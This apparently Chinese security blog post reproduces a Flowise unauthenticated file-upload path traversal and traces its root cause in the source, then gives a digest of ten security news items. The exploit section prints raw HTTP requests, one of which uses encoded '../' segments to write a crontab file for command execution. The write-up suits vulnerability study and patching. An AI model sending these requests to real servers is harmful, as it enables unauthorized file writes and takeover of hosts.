漏洞简介 Flowise是一款与LangChain兼容的开源低代码工具，使普通用户和开发人员都能通过可视化连线方式创建LLM工作流和AI应用。然而该平台存在严重的文件上传漏洞——尽管Flowise实施了上传校验机制，攻击者仍可通过特殊编码绕过限制，实现任意目录的文件写入。这一安全缺陷使未经授权的攻击者能够上传恶意文件、脚本或SSH密钥，从而获取对托管服务器的远程控制权，对使用该平台构建AI代理的组织构成重大安全威胁。 漏洞复现 安装环境后构造上传的数据包 POST /api/v1/attachments/test/test HTTP/1.1 Host: localhost:3000 Accept: application/json, text/plain, */* x-request-from: internal User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:3000/apikey Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 215 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="files"; filename="test.txt" Content-Type: text/plain This is the content of the file. ------WebKitFormBoundary7MA4YWxkTrZu0gW-- 在服务器上查找上传文件的位置 再次构造数据包 POST /api/v1/attachments/..%2ftest/test HTTP/1.1 Host: localhost:3000 Accept: application/json, text/plain, */* x-request-from: internal User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:3000/apikey Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 215 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="files"; filename="test.txt" Content-Type: text/plain This is the content of the file. ------WebKitFormBoundary7MA4YWxkTrZu0gW-- 在服务器上再次查找文件位置 成功实现跨越目录的上传操作 进一步的进行利用的话 可以通过向定时任务中写入文件实现任意命令执行 POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fusr/..%2fvar%2fspool%2fcron%2fcrontabs HTTP/1.1 Host: localhost:3000 Accept: application/json, text/plain, */* x-request-from: internal User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:3000/apikey Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 657 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="files"; filename="root" Content-Type: text/plain # do daily/weekly/monthly maintenance # min   hour   day     month   weekday command */15    *       *       *       *       run-parts /etc/periodic/15min 0       *       *       *       *       run-parts /etc/periodic/hourly 0       2       *       *       *       run-parts /etc/periodic/daily 0       3       *       *       6       run-parts /etc/periodic/weekly 0       5       1       *       *       run-parts /etc/periodic/monthly * * * * * echo "a" >> /tmp/test.txt ------WebKitFormBoundary7MA4YWxkTrZu0gW-- 漏洞分析 在Flowise平台的核心架构中，通过constants.ts 文件定义了一系列无需认证即可访问的API端点，这些端点被归类为WHITELIST_URLS 。该设计允许特定功能（如API密钥验证、公共聊天流和文件操作等）在未经认证的情况下运行，以提高用户体验和系统灵活性。 Flowise-main/packages/server/src/utils/constants.ts 当服务器接收到新的HTTP请求时，其鉴权流程遵循严格的逻辑顺序：首先检查请求路径是否包含"/api/v1"前缀（不区分大小写）；接着进行大小写敏感的路径验证；随后系统会判断该URL是否存在于预定义的白名单中。若请求路径已被列入白名单，则继续处理；否则，系统会进一步检查请求头中是否包含"internal"标记，或尝试验证API密钥。 Flowise-main/packages/server/src/index.ts Flowise-main/packages/server/src/routes/attachments/index.ts Flowise-main/packages/server/src/services/attachments/index.ts#createFileAttachment /api/v1/attachments/ 路由下存在上传创建文件的操作 Flowise-main/packages/server/src/utils/createAttachment.ts#createFileAttachment createFileAttachment 中会调用 addArrayFilesToStorage 来对文件进行处理 此时我们也可以看到对应的所有上传路由 /api/v1/attachments/:chatflowId/:chatId Flowise-main/packages/components/src/storageUtils.ts#addArrayFilesToStorage 在 addArrayFilesToStorage 中对文件地址进行处理时，会将 chatflowId 和 chatId 未经处理也直接拼接到路径中，所以可以通过编码就直接绕过目录限制实现跨目录的上传。

1、攻击者通过恶意邮件传播SnakeKeylogger窃密木马 https://www.seqrite.com/blog/snakekeylogger-a-multistage-info-stealer-malware-campaign/ 研究人员近期发现一个恶意软件活动，该活动将SnakeKeylogger作为最终载荷植入到目标系统中。初始诱饵文件是一个包含.img文件的恶意电子邮件。该.img文件中含有一个伪装成PDF文档的可执行程序，攻击者以此诱导用户执行该程序。该程序是由.NET编写的下载器，它会连接远程服务器并下载后续载荷，并最终植入SnakeKeylogger。 2、CrushFTP修复一个安全漏洞并提醒用户尽快更新 https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-unauthenticated-access-flaw-immediately/ CrushFTP修复未经身份验证的HTTP(S)端口访问漏洞，并提醒用户立即对CrushFTP进行更新。如果未修复该漏洞的服务器通过HTTP(S)在网络中公开，则攻击者能够利用此安全漏洞获得未经身份验证的访问权限。CrushFTP于2025年3月21日对该漏洞进行修复，很快将会对其分配CVE编号。用户应立即更新至CrushFTP v11.3.1+版本，无法更新 3、博通修复VMware Tools for Windows中的一个安全漏洞 https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25518 博通发布安全更新，修复VMware Tools for Windows中的一个身份验证绕过漏洞。该漏洞被标识为CVE-2025-22230（CVSS评分7.8），是由不正确的访问控制缺陷引起的，具有低权限的本地攻击者可以在不需要用户交互的低复杂性攻击中利用它，从而在易受攻击的虚拟机上获得高权限。 4、Cloudflare R2服务中断事件：密码轮换错误引发全球故障 https://www.freebuf.com/news/425731.html Cloudflare近日宣布，其R2对象存储及相关服务发生了一次持续1小时7分钟的中断事件，导致全球范围内出现100%的写入失败和35%的读取失败。Cloudflare R2是一项可扩展的、与S3兼容的对象存储服务，提供免费数据检索、多区域复制以及与Cloudflare的深度集成。 5、新Windows零日漏洞泄露NTLM哈希值，非官方补丁已发布 https://www.freebuf.com/vuls/425728.html 针对一个新的Windows零日漏洞（zero-day vulnerability），现已提供免费的非官方补丁。该漏洞允许远程攻击者通过诱骗目标在Windows资源管理器中查看恶意文件来窃取NTLM（NT LAN Manager）凭据。NTLM协议已被广泛用于NTLM中继攻击（NTLM relay attacks，即威胁行为者迫使易受攻击的网络设备向攻击者控制的服务器进行身份验证）和哈希传递攻击（pass-the-hash attacks，即利用漏洞窃取NTLM哈希值，这些哈希值是经过哈希处理的密码）。攻击者随后 6、FBI警告：警惕免费在线文档转换工具 https://www.csoonline.com/article/3853045/fbi-warns-beware-of-free-online-document-converter-tools.html 加拿大安全意识培训提供商Beauceron Security的负责人David Shipley回应了FBI丹佛外勤办公室本月早些时候发布的警告，该警告指出，利用免费在线文档转换工具窃取信息或在用户电脑上加载恶意软件的诈骗行为正在增加。 7、CloudSEK 提供新证据反驳 Oracle 否认数据泄露 https://hackread.com/cloudsek-disputes-oracle-data-breach-denial-evidence/ Oracle 目前正陷入一场网络安全风波，有消息称其云基础设施遭受了大规模数据泄露。上周，Hackread.com 发布了一篇文章，基于网络安全公司 CloudSEK 的调查结果，揭示了一名威胁行为者从 Oracle 云中窃取了 600 万条记录。 8、Gartner发布2025年网络安全重要趋势 https://mp.weixin.qq.com/s/8KhOhOlIZ2vtaBVpu-gVuA Gartner公司于近日发布2025年网络安全重要趋势。这些趋势受到包括生成式人工智能（GenAI）的演进、数字去中心化、供应链相互依存、监管变化、地方性人才短缺和不断变化的威胁态势等在内的因素影响。 9、Cloudflare推出AI迷宫：新型策略应对AI爬虫 https://cybersecuritynews.com/cloudflare-unveils-ai-labyrinth-a-new-approach-to-exhaust-ai-crawlers/ Cloudflare近日推出了名为“AI迷宫”的创新工具，旨在通过将未经授权的网络爬虫重定向到一个由AI生成内容的无限迷宫中，来应对这些恶意爬虫。 10、Chrome 严重漏洞或致攻击者执行任意代码 https://www.anquanke.com/post/id/305483 Google 已确认 Chrome 浏览器存在一个严重安全漏洞，该漏洞影响着 Windows、Mac、Linux 和Android 平台上的数十亿用户。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。